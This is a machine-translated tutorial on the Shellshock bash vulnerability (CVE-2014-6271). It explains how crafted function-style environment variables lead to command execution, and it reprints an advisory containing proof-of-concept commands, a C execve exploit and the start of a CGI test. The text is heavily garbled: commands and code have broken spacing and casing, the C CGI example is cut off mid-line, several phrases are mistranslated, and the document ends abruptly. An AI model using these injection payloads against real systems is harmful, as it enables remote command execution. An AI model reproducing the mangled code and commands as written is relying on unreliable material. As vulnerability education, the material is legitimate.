Bash environment variable parsing vulnerability for beginners

1. What are environment variables?

Both Windows and Linux programs support environment variables. Generally, environment variables are stored at the beginning of the process memory space as value strings. When you execute a program, you can specify the environment variables to pass information to the program to be executed. On a Windows platform dominated by GUI, generally, users seldom need to use environment variables to transmit information to programs. Environment variables are resources in the process space. Environment Variables of different processes cannot be shared. However, you can copy the environment variables of the parent process to the child process through the process resource Inheritance Mechanism. For example, the environment variables set for the bash process are automatically copied to the subprocesses started through bash.

Different programs have different degrees of application to environment variables. Many small programs can ignore environment variables. However, many programs depend heavily on environment variables, such as CGI programs for Web applications. All the form data is transmitted to CGI programs by the Web server process in the form of environment variables. Below is a simple CGI program written in C language.

Int main (void) {char * data; long M, N; printf ("% S % C", "Content-Type: text/html; charset = gb2312 ", 13, 10); printf ("<title> multiplication result </title>"); printf ("
It can be seen that the GET request string sent from the client is passed to this program through the Environment Variable QUERY_STRING.
Bash is also a heavy user of environment variables. Of course, CGI programs written in bash are more dependent on environment variables. The following is a CGI program written in bash.
#!/bin/bash    echo ‘Content-type: test/html‘  echo ‘‘  echo $QUERY_STRING  
The environmental variable QUERY_STRING is also used.
2. Bash Vulnerability Analysis of Environment Variables

As mentioned above, environment variables are special strings and must be analyzed and processed by environment variables. String processing is a very important task in most programs. It is more important for web programs (HTML, XML, JSON file content itself is a string ).
Bash is no exception. It needs to analyze the environment variable string, then explain its meaning and perform related operations. Since the bash script itself is a text string, the bash engine can simply convert the environment variable string into a string in the script format and merge it with the bash script to be executed, then explain and execute the merged script.
For example, the following script:
The value of ECHO environment variable X is $ X.
If the environment variable is X = 100, the combined environment is equivalent:
X = 100 the value of ECHO environment variable X is $ x
We can use the Env tool to test the effect. env is used to specify environment variables for the program to be executed.
[[Email protected] ~] # Env x = 100 bash-C 'echo environment variable X: $ x'; environment variable X: 100
Then construct an environment variable for a special point.
[[Email protected] ~] # Env x = '() {echo I am an environment variable;}; 'bash-C' env'; hostname = localhost. localdomain .... omit show irrelevant environment variable ssh_connection = 172.16.35.220 60128 172.16.35.135 22 lessopen = |/usr/bin/lesspipe. sh % sg_broken_filenames = 1X = () {echo I am an environment variable}
At this time, the environment variable X is only a string, but Bash interprets it as a function type rather than a string type value. So you can directly execute this function. As follows:
[[Email protected] ~] # Env x = '() {echo I am an environment variable;}; 'bash-C' x'; I am an environment variable
In this case, bash interprets the environment variables and converts them to the following script:
X () {echo I am an environment variable ;};
Instead of copying it as X = () {echo I am an environment variable ;};
It can be seen that Bash has different interpretations of environment variable values in different string formats.
Continue to make the value of X more complex, as shown below:
[[Email protected] ~] # Env x = '() {echo I am an environment variable;}; echo you recruited 'bash-C' env' and you recruited hostname = localhost. localdomainshell =/bin/bashssh_connection = 172.16.35.220 60128 172.16.35.135 22 lessopen = |/usr/bin/lesspipe. sh % sg_broken_filenames = 1X = () {echo I am an environment variable }_=/bin/env
The problem has occurred! In this case, the value of environment variable X set by env for Bash is
() {ECHO: I'm an environment variable;}; ECHO: you caught it.
Bash interprets the first half as the function body of Function x, but does not do anything about the second half. It is directly converted into a script as it is. The script is as follows:
X () {ECHO: I'm an environment variable;}; ECHO: You got it.
The merged script is as follows:
X () {echo I am an environment variable;}; echo you recruited env
In this way, you can directly execute echo. In fact, this command can be replaced with any other command, so that Bash can execute any command. This is the basic principle of this bash vulnerability.
Let's take a look at the effect after patching.
[[Email protected] ~] # Env x = '() {echo I am an environment variable;}; echo you recruited 'bash-C' env 'hostname = localhost. localdomainshell =/bin/bashx = () {echo I am an environment variable;}; echo you recruited Path =/usr/local/sbin:/usr/local/bin: /sbin:/bin:/usr/sbin:/usr/bin:/root/bin _ =/bin/ENV [[email protected] ~] # Env x = '() {echo I am an environment variable;}; echo you recruited 'bash-C' echo $ x' () {echo I am an environment variable ;}; echo, you got a trick.
It can be seen that Bash does not regard X as a function to explain at this time, but assigns all the environment variable values as pure strings to X.
3. Who will be affected by the bash vulnerability?
Through the above principle analysis, we know that any program that can pass environment variables to bash through some means is affected by this. Of course, the most typical is the CGI program written by Bash. The client adds the value () {echo I am an environment variable;} in the request string; echo the form value you recruited, attackers can easily attack the servers running CGI.
At present, most general websites seldom use CGI, so the problem is not too big. However, there are many network devices, such as vro switches, which use CGI programs written in Perl or other languages. As long as Bash is called at the underlying layer, there is a great risk.
Currently, patches for this vulnerability have been released. Please add them as soon as possible. Unfortunately, there is still another vulnerability in the leaked file content after the patch is installed. For details, refer to the following reprinted article: https://raw.githubusercontent.com/citypw/DNFWAH/master/4/d4_0x07_DNFWAH_shellshock_bash_story_cve-2014-6271.txt
[[Email protected] $ uname-alinux Shawn-fortress 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0 + kali8 i686 GNU/Linux |=|=----- = [d o n o t f u C k W I t h a C K E R] = ----- = ||=||=-------------------------- [#4 file 0x07] ------------------------- = | = ----------------------- ------------------------------------------ = | = ------------------- = [Bash shellshock event:] = -------------------- = | = --------------------- = [CVE-2014-6271 Data Summary] = -------------------- = | = threads = [by Shawn the r0ck] = threads = | = threads = | = -------------- --------- = [Sep 25 2014] = -------------------------- = | = ----------------------------------------------------------------- = | -- [content0. what is bash1. CVE-2014-62712. incomplete patch and story To be continued... -- [0. what is bashbourne again shell (BASH), the most popular shell implementation on GNU/Linux, was born in 1980, after decades of evolution, a simple terminal command line interpreter has evolved into a multi-functional interface deeply integrated with the GNU system. -- [1. CVE-2014-6271 French GNU/Linux enthusiast Stéphane chazelas found a famous shell implementation bash vulnerability in middle September 2014, you can by constructing the value of environment variables to execute the script code you want to execute, according to reports, this vulnerability affects many applications running on GNU/Linux that interact with Bash, including: ** in sshd configuration, forcecommand is used to restrict remote users from executing commands. This vulnerability can bypass the restriction to execute any commands. Some restrictions on the deployment environment of git and subversion shell will also show similar situations. OpenSSH is usually used normally. ** The Apache server uses mod_cgi or mod_cgid. If the CGI script is in bash or runs in a sub-shell, it will be affected. Use C's system/popen in the sub-shell, and OS in Python. system/OS. this vulnerability affects the use of open/System in popen, PHP in system/exec (CGI Mode), and Perl. ** PHP script execution in mod_php will not be affected. ** The DHCP client can exploit this vulnerability to call shell scripts to receive environment variable parameter values of remote malicious servers. ** The daemon and SUID programs may also be affected to execute shell scripts in the environment where environment variables are set. ** Any other program executing shell scripts using Bash as the interpreter may be affected. If the shell script is not exported, it will not be affected. Let's take a look at a simple PoC: 1. test whether a vulnerability exists in the local shell Environment: $ ENV x = '(){:;}; echo vulnerable 'bash-c "echo this is a test" if the vulnerability exists, "vulnerable" is printed ". 2, C program: idea/* CVE-2014-6271 + aliases with slashes POC-je [at] clevcode [Dot] Org */# include <unistd. h> # include <stdio. h> int main () {char * envp [] = {"Path =/bin:/usr/bin", "/usr/bin/id = () {"" Echo pwn me twice, shame on me ;}; "" Echo pwn me once, shame on you ", null }; char * argv [] = {"/bin/bash", null}; execve (argv [0], Argv, envp); perror ("execve"); return 1;} [email protected]: ~ $ Gcc-O bash-is-fun bash-is-fun.c [email protected]: ~ $. /Bash-is-funpwn me once, shame on you [email protected]:/home/Je $/usr/bin/idpwn me twice, shame on me -------------------------------------------------------------- in this POC, we can see that Bash is not processing the end. We can see why through patches later. 3. Test the HTTP environment on invisiblethreat: Create a script named POC. cgi :#! /Bin/bash echo "Content-Type: text/html "Echo" "Echo '<HTML> 'echo' 
Bash environment variable parsing vulnerability for beginners